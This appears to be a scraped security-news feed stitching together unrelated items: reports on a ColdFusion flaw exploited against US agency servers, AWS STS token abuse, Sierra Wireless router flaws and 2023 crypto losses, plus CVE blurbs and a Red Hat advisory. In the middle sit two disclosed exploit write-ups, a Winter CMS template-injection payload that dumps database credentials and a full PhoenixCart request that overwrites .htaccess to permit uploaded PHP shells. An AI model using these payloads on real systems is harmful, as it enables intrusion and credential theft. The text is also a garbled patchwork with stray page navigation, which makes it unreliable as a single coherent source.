By Deeba Ahmed
CISA Warns of Critical Adobe ColdFusion Vulnerability Actively Exploited by Threat Actors.
This is a post from HackRead.com Read the original post: Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

Authorities urge Adobe ColdFusion customers to promptly install patches and update their systems.

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a Cybersecurity Advisory (CSA) alerting organizations to the exploitation of a critical vulnerability in Adobe ColdFusion by unidentified threat actors.

The vulnerability, **CVE-2023-26360**, affects Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier), as well as older ColdFusion installations that Adobe no longer supports.

Exploitation of CVE-2023-26360 allows threat actors to execute arbitrary code on affected systems, posing a significant security risk. The vulnerability was added to CISA’s known exploited vulnerability (KEV) catalogue right after its discovery, and an April 5 deadline was given to agencies to fix the issue. 

Adobe ColdFusion is a widely used software suite for web application development. Hackread has been reporting this vulnerability ever since it was **discovered** in March. We reported in August 2023 that this critical remote code execution (RCE) flaw, which impacts both Windows and macOS platforms, allows attackers to seize control of affected systems, making it a high-severity cybersecurity risk. Adobe **released** security patches to address the following vulnerabilities:

*   APSB23-40
*   APSB23-41
*   APSB23-47

However, FortiGuard Labs observed continued exploitation attempts at that time, indicating that some users had not yet applied the patches.

Now, the same vulnerability has been exploited by unidentified hackers to gain access to two systems within a Federal Civilian Executive Branch (**FCEB**) agency. Reportedly, the FCEB was running outdated versions, including ColdFusion, which made it vulnerable to the exploit. The hackers were able to gain initial access to two public-facing web servers within the agency’s pre-production environment.

At least two public-facing servers within a Federal Civilian Executive Branch (FCEB) agency were **targeted** with this vulnerability between June and July 2023. Here are the details of the attacks:

**June 2:** Initial access, reconnaissance activities (local/domain admin information, network configurations, user details), and deployment of a remote access trojan (**RAT**). Attempts to exfiltrate data, obtain credentials, download data from C2 infrastructure, and change policies were unsuccessful.

**June 26:** Attackers connected through a malicious IP address, exploited the vulnerability, and analysed running processes. They navigated the filesystem, deleted logs, and executed malicious code designed for ColdFusion versions 9 and below (targeting usernames, passwords, and URLs).

The code could enable future attacks and upload additional files from an unknown source. Password decryption was not possible due to the agency’s newer ColdFusion version. Attempts to conceal the web shell also failed.

While the hackers could insert malware and launch a reconnaissance campaign, there is no evidence of data exfiltration or lateral movement. The agency removed the compromised servers from the network within 24 hours of receiving the alert. CISA is yet to clarify whether the two attacks originated from the same operators.

****_RELATED ARTICLES_****

1.  **68% of US Websites Exposed to Bot Attacks**
2.  **Fake Lockdown Mode Exposes iOS Users to Malware Attacks**
3.  **Cyberattack Defaces Israeli-Made Equipment at US Water Agency**
4.  **Hackers Leak Thousands of Idaho National Lab Employees’ PII Data**
5.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**

Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

The login REST API in ProLion CryptoSpike 3.0.15P2 (when LDAP or Active Directory is used as the users store) allows a remote blocked user to login and obtain an authentication token by specifying a username with different uppercase/lowercase character combination.

CVE-2023-36655

TOTOLINK A3002RU version 2.0.0-B20190902.1958 has a post-authentication RCE due to incorrect access control, allows attackers to bypass front-end security restrictions and execute arbitrary code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48859: security_research/TOTOLINK-A3002RU-RCE.md at main · xieqiang11/security_research

Winter CMS version 1.2.2 suffers from a server-side template injection vulnerability.

    # Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)# Exploit Author: tmrswrr# Date: 12/05/2023# Vendor: https://wintercms.com/# Software Link: https://github.com/wintercms/winter/releases/v1.2.2# Vulnerable Version(s): 1.2.2#Tested : https://www.softaculous.com/demos/WinterCMS1 ) Login with admin cred and click CMS > Pages field > Plugin components >     https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup2 ) Write SSTI payload : {{7*7}}3 ) Save it , Click Priview :     https://demos6.demo.com/WinterCMS/demo/plugins4 ) You will be see result :     49 Payload :    {{ dump() }} Result :         "*::database" => array:4 [▼          "default" => "mysql"          "connections" => array:4 [▼            "sqlite" => array:5 [▼              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"              "driver" => "sqlite"              "foreign_key_constraints" => true              "prefix" => ""              "url" => null            ]            "mysql" => array:15 [▼              "charset" => "utf8mb4"              "collation" => "utf8mb4_unicode_ci"              "database" => "soft_pw3qsny"              "driver" => "mysql"              "engine" => "InnoDB"              "host" => "localhost"              "options" => []              "password" => "8QSz9(pT)3"              "port" => 3306              "prefix" => ""              "prefix_indexes" => true              "strict" => true              "unix_socket" => ""              "url" => null              "username" => "soft_pw3qsny"            ]            "pgsql" => array:12 [▶]            "sqlsrv" => array:10 [▶]          ]          "migrations" => "migrations"          "redis" => array:4 [▼            "client" => "phpredis"            "options" => array:2 [▼              "cluster" => "redis"              "prefix" => "winter_database_"            ]            "default" => array:5 [▼              "database" => "0"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]            "cache" => array:5 [▼              "database" => "1"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]          ]        ]      ]

Winter CMS 1.2.2 Server-Side Template Injection

CE Phoenixcart version 1.0.8.20 suffers from a remote shell upload vulnerability.

## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE  
## Author: nu11secur1ty  
## Date: 12/06/2023  
## Vendor: https://phoenixcart.org/index.php  
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:  
The Categories/Products Product Images upload function, is ABSOLUTELY  
NOT SANITIZING WELL for file uploading from any type of extension!  
In this case, you can see a bypassing of .HTACCESS SECURITY file and  
uploading an info.php exploit file which info.php can be executed from  
everywhere for dumping the all information about the server! This can  
be done on the demo server! Please do not do this! I am a Penetration  
Tester, not a stupid cracker, and that's why I downloaded it,  
installed it, and tested it!  
If you want to test it yourself please download it, install it, and test it!  
Thank you all!

STATUS: HIGH-CRITICAL Vulnerability  
[+]Exploit execution:  
```POST  
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 2952  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://pwnedhost7.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt  
Connection: close

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="formid"

733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_added"

2023-12-06 11:36:36  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_status"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_quantity"

0  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_available"

2023-12-14 00:00:00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="manufacturers_id"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_model"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_tax_class_id"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price"

1000.0000  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price_gross"

1070  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_weight"

1.00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_gtin"

00000000000001  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_name[1]"

pwned  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_description[1]"

pwned your services  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_url[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_title[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_description[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_keywords[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_large_1";  
filename=".htaccess"  
Content-Type: application/octet-stream

# $Id$  
#  
# This is used to restrict access to this folder to anything other  
# than images

# Prevents any script files from being accessed from the images folder  
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">  
  <IfModule mod_authz_core.c>  
    # Require all denied  
  </IfModule>

  <IfModule !mod_authz_core.c>  
    Order Deny,Allow  
    # Deny from all  
    Allow from all  
  </IfModule>  
</FilesMatch>

Options -Indexes

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_htmlcontent_1"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1--

```

[+]Response:  
```PHP  
GET /PhoenixCart/images/info.php HTTP/1.1  
Host: pwnedhost7.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)

## Time spent:  
00:17:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

CE Phoenixcart 1.0.8.20 Shell Upload

Red Hat Security Advisory 2023-7653-03 - An update to the images for Red Hat Integration - Service Registry is now available from the Red Hat Container Catalog. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Issues addressed include bypass and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7653.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Service Registry (container images) release and security update [2.5.4 GA]  
Advisory ID:        RHSA-2023:7653-03  
Product:            Red Hat Integration  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7653  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-1584  
====================================================================

Summary: 

An update to the images for Red Hat Integration - Service Registry is now available from the Red Hat Container Catalog. The purpose of this text-only errata is to inform you about the security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release of Red Hat Integration - Service Registry 2.5.4 GA includes the following security fixes.

Security Fix(es):

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) [rhint-serv-2] (CVE-2023-44487)

* quarkus-vertx-http: quarkus: HTTP security policy bypass [rhint-serv-2] (CVE-2023-4853)

* netty: SniHandler 16MB allocation leads to OOM [rhint-serv-2] (CVE-2023-34462)

* snappy-java: Unchecked chunk length leads to DoS [rhint-serv-2] (CVE-2023-34455)

* quarkus-oidc: ID and access tokens leak via the authorization code flow [rhint-serv-2] (CVE-2023-1584)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-1584

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2180886  
https://bugzilla.redhat.com/show_bug.cgi?id=2215445  
https://bugzilla.redhat.com/show_bug.cgi?id=2216888  
https://bugzilla.redhat.com/show_bug.cgi?id=2238034  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7653-03


Exposure of Proxy Administrator Credentials

An authenticated administrator equivalent Filr user can access the credentials of proxy administrators.



Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-32268: Portal

Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks.
The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth said in a Tuesday analysis.
AWS STS is a web service that enables

Access Management / Cloud Security

Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks.

The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth said in a Tuesday analysis.

AWS STS is a web service that enables users to request temporary, limited-privilege credentials for users to access AWS resources without needing to create an AWS identity. These STS tokens can be valid anywhere from 15 minutes to 36 hours.

Threat actors can steal long-term IAM tokens through a variety of methods like malware infections, publicly exposed credentials, and phishing emails, subsequently using them to determine roles and privileges associated with those tokens via API calls.

"Depending on the token's permission level, adversaries may also be able to use it to create additional IAM users with long-term AKIA tokens to ensure persistence in the event that their initial AKIA token and all of the ASIA short term tokens it generated are discovered and revoked," the researcher said.

In the next stage, an MFA-authenticated STS token is used to create multiple new short-term tokens, followed by conducting post-exploitation actions such as data exfiltration.

To mitigate such AWS token abuse, it's recommended to log CloudTrail event data, detect role-chaining events and MFA abuse, and rotate long-term IAM user access keys.

"AWS STS is a critical security control for limiting the use of static credentials and the duration of access for users across their cloud infrastructure," the researchers said.

"However, under certain IAM configurations that are common across many organizations, adversaries can also create and abuse these STS tokens to access cloud resources and perform malicious actions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: Threat Actors Can Leverage AWS STS to Infiltrate Cloud Accounts

A collection of 21 security flaws have been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS.
Collectively tracked as Sierra:21, the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according

Cyber Threat / Vulnerability

A collection of 21 security flaws have been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS.

Collectively tracked as **Sierra:21**, the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according to Forescout Vedere Labs. A majority of these devices are located in the U.S., Canada, Australia, France, and Thailand.

"These vulnerabilities may allow attackers to steal credentials, take control of a router by injecting malicious code, persist on the device and use it as an initial access point into critical networks," the industrial cybersecurity company said in a new analysis.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Of the 21 vulnerabilities, one is rated critical, nine are rated high, and 11 are rated medium in severity.

This includes remote code execution (RCE), cross-site scripting (XSS), denial-of-service (DoS), unauthorized access, and authentication bypasses that could be exploited to seize control of vulnerable devices, conduct credential theft via injection of malicious JavaScript, crash the management application, amd conduct adversary-in-the-middle (AitM) attacks.

These shortcomings can also be weaponized by botnet malware for worm-like automatic propagation, communication with command-and-control (C2) servers, and enslaving affected susceptible machines to launch DDoS attacks.

Fixes for the flaws have been released in ALEOS 4.17.0 (or ALEOS 4.9.9), and OpenNDS 10.1.3. TinyXML, on the other hand, is no longer actively maintained, necessitating that the problems be addressed downstream by affected vendors.

"Attackers could leverage some of the new vulnerabilities to take full control of an OT/IoT router in critical infrastructure and achieve different goals such as network disruption, espionage, lateral movement and further malware deployment," Forescout said.

"Vulnerabilities impacting critical infrastructure are like an open window for bad actors in every community. State-sponsored actors are developing custom malware to use routers for persistence and espionage. Cybercriminals are also leveraging routers and related infrastructure for residential proxies and to recruit into botnets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Sierra:21 - Flaws in Sierra Wireless Routers Expose Critical Sectors to Cyber Attacks

By Waqas
November 2023 has emerged as the most devastating year for crypto users and the most lucrative for cybercriminals and malicious hackers, as the majority of crypto hacks occurred during that month.
This is a post from HackRead.com Read the original post: Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed

According to the crypto bug bounty and cybersecurity firm Immunefi, hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents.

The world’s leading blockchain cybersecurity platform, Immunefi, has published its Crypto Losses in November 2023 Report, according to which **cryptocurrency losses** have surpassed $1.75 billion due to hacks and rug pull attacks between January and November 2023. This includes 296 distinct incidents. The cryptocurrency ecosystem has witnessed $1,753,707,812 in losses year-to-date (YTD) across 296 specific incidents.

Graph credit: Immunefi

The report is quite concerning. It comes at the same time when the cybersecurity firm Unciphered discovered a critical vulnerability, dubbed ‘**Randstorm**,’ that has put billions of dollars in Bitcoin and crypto assets at risk due to outdated wallets.

In Immunefi’s October 2023 **report**, the Singapore-based Immunefi revealed that cryptocurrency attacks surged by 153% year-over-year in Q3 2023. The two largest exploits targeting Multichain and Mixin Network collectively accounted for 47.5% of all losses. The North Korean state-sponsored hacking group **Lazarus Group**’s cyberattack represented 30% of the total losses, with $208.6 million in stolen funds.

According to Immunefi’s latest **report** (PDF), a record-breaking $343 million was lost to fraud and hacks in November 2023 alone, making it the highest monthly loss this year, representing a significant 15.4x increase from October 2023’s losses that amounted to $22 million.

Hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents. This highlights that hacking poses a persistent threat in the cryptocurrency space.

On the other hand, fraudulent activities resulted in losses of $7,464,660 in 23 separate incidents, which is comparatively lower than hacking but remains a concerning issue in the industry.

In a notable shift, Centralized Finance (**CeFi**) emerged as the primary target for exploits in November 2023, surpassing Decentralized Finance (**DeFi**) in lost funds. Immunefi found that CeFi accounted for 53.8% of overall losses, whereas DeFi accounted for 46.2%. These spikes are primarily attributed to high-profile attacks on platforms like HTX Exchange, Poloniex, and Kronos Research.

DeFi platforms recorded $158,638,810 in losses in November 2023 in 37 distinct incidents, making DeFi a vulnerable sector. CeFi platforms suffered $184,400,000 in losses in November 2023 in four incidents.

The BNB Chain and **Ethereum blockchains** remained the most targeted platforms in November 2023, accounting for more than half (83%) of the total losses in all targeted chains.

BNB Chain became a target of 22 incidents, leading to losses of 53.7% of the total losses, whereas Ethereum accounted for 29.3% of the total losses with 12 incidents. Arbitrum, Optimism, Avalanche, Fantom, and Heco Chain each suffered one attack in November 2023, contributing the remaining 2.4% of the total losses.

Immunefi is the premier **bug bounty** and security services provider, safeguarding Web3 ecosystems and protecting a staggering $50 billion in user funds with its vast network of white hackers.

Graph credit: Immunefi

**Immunefi** empowers cybersecurity experts to scrutinize project code, detect and responsibly disclose vulnerabilities, and offer rewards for their contributions. This collaborative approach, according to the company, has resulted in the disbursement of over $85 million in total bounties, averting potential losses of over $25 billion in user funds. Since its inception, Immunefi has saved over $25 billion from being stolen.

As an investor in the ever-evolving world of cryptocurrency, DeFi, blockchain, and Web3, it’s crucial to prioritize the security of your digital assets. Here are 5 essential tips to protect your funds from hackers and cyber attacks:

****Secure Your Wallets****

*   **Use Cold Wallets:** These hardware devices store your private keys offline, making them significantly less susceptible to cyberattacks compared to hot wallets (software wallets connected to the internet). Popular cold wallets include Ledger, Trezor, and KeepKey.
*   **Diversify Your Wallets:** Don’t store all your funds in one wallet. Distribute them across multiple wallets for better risk management.
*   **Implement Strong Passwords:** Use unique and complex passwords for all your wallets and exchanges. Consider password managers for efficient management.
*   **Enable 2-Factor Authentication (2FA):** 2FA adds an extra layer of security by requiring a second verification factor, like a code sent to your phone, when logging in or making transactions.

****Practice Cybersecurity Hygiene****

*   **Stay Vigilant:** Be wary of phishing scams, unsolicited emails, and suspicious links. Never share your private keys or seed phrases with anyone, even those claiming to be support personnel.
*   **Keep Software Updated:** Ensure your operating systems, wallets, and other relevant software are updated with the latest security patches.
*   **Use Secure Networks:** Avoid using public Wi-Fi for accessing your crypto accounts. Opt for secure, private networks whenever possible.
*   **Be Cautious of dApps**: Before interacting with any dApp (decentralized application), research its reputation and security practices.

****Choose Reputable Platforms:****

*   **Research Exchanges:** Before investing in an exchange, thoroughly research its security features, reputation, and regulatory compliance.
*   **Prioritize Transparency:** Choose platforms that prioritize transparency in their operations and code.
*   **Beware of Unknown Projects:** Exercise caution when investing in unfamiliar projects or dApps. Conduct thorough research and due diligence before committing any funds.

****Stay Informed and Educate Yourself:****

*   **Continuously learn:** The crypto landscape is constantly evolving, so stay updated on the latest security threats and best practices. Follow reliable sources and participate in educational communities.
*   **Be aware of common scams:** Learn about common phishing tactics, exit scams, and other fraudulent activities targeting crypto investors.
*   **Seek expert advice:** If you’re unsure about any aspect of crypto security, don’t hesitate to consult with a trusted security expert or financial advisor.

****Backup Your Keys:****

*   **Always have a backup plan:** Create backups of your private keys and seed phrases and store them securely offline, preferably in multiple locations.
*   **Consider multi-signature wallets:** These wallets require multiple keys to authorize transactions, offering an additional layer of protection.

Lastly, but most importantly, visit Hackread.com regularly. Follow us on **X (formerly Twitter)**, **Facebook**, or **LinkedIn** to stay updated on daily cybersecurity news and threats.

****_RELATED ARTICLES_****

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammers Exploit Gaza Crisis in Donation Scam**
3.  **We Need Smarter Smart Contracts To Prevent DeFi Hacks**
4.  **New MortalKombat Ransomware Attack Aiming for Crypto Wallets**
5.  **Scammers Use Fake Ledger App on Microsoft Store to Steal $800K**
6.  **8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack**

Tag

#auth